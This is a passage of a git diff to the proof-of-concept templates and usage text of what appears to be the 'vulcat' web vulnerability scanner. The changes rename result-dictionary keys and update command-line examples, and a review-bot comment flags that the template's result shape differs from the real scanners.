'Path': path,
- 'Data': data,
- 'Cookie': 'xxx',
- 'Headers': vul_info['headers']
- }
+ 'Headers': headers,
+ 'Cookie': 'XXX'
+ },
+ 'Request': res # * 会输出一个http数据包
}
return results
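Review bot: The template now stores the response under `'Request': res` next to a nested `'Payload'` dict, while every scanner changed in this commit (ShowDoc, Spring, ThinkPHP, Weblogic, Webmin, Nodejs) stores it as `'Payload': res` with no nested dict, so a contributor copying this template produces a result shape that matches none of the real scanners. Whichever key the output layer reads, the template and the scanners should agree; if `'Payload': res` is the intended shape, replace the nested dict here with `'Payload': res  # * 会输出一个http数据包`. The docstring line added above calls it `Response类型`, which matches neither key name. demo2.py has the same divergence.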
diff --git a/payloads/demo2.py b/payloads/demo2.py
index b945d20..d3fc0b0 100644
--- a/payloads/demo2.py
+++ b/payloads/demo2.py
@@ -101,6 +101,7 @@ def 7_scan(self, url): # ! 7: POC的名称(例如 c
key1: value1
key2: value2
...
+ Response类型: 会以一个http数据包的格式进行显示
'''
if ('12'): # ! 12: 判断扫描结果
results = {
@@ -110,10 +111,10 @@ def 7_scan(self, url): # ! 7: POC的名称(例如 c
'Payload': {
'Url': url,
'Path': path,
- 'Data': data,
- 'Cookie': 'xxx',
- 'Headers': headers
- }
+ 'Headers': headers,
+ 'Cookie': 'XXX'
+ },
+ 'Request': res # * 会输出一个http数据包
}
return results
diff --git a/vulcat.py b/vulcat.py
index bf42dd5..c72fc54 100644
--- a/vulcat.py
+++ b/vulcat.py
@@ -19,9 +19,11 @@
corescan.start() # * 开始扫描
else:
print('''Please specify parameters, example:
- python3 f.py -h
- python3 f.py -u http://www.example.com/
- python3 f.py -f url.txt
+ python3 vulcat.py -h
+ python3 vulcat.py -u http://www.example.com/
+ python3 vulcat.py -f url.txt
+ python3 vulcat.py --list
+ python3 vulcat.py --version
''')
except KeyboardInterrupt:
print(color.reset('CTRL + C exit the scan'))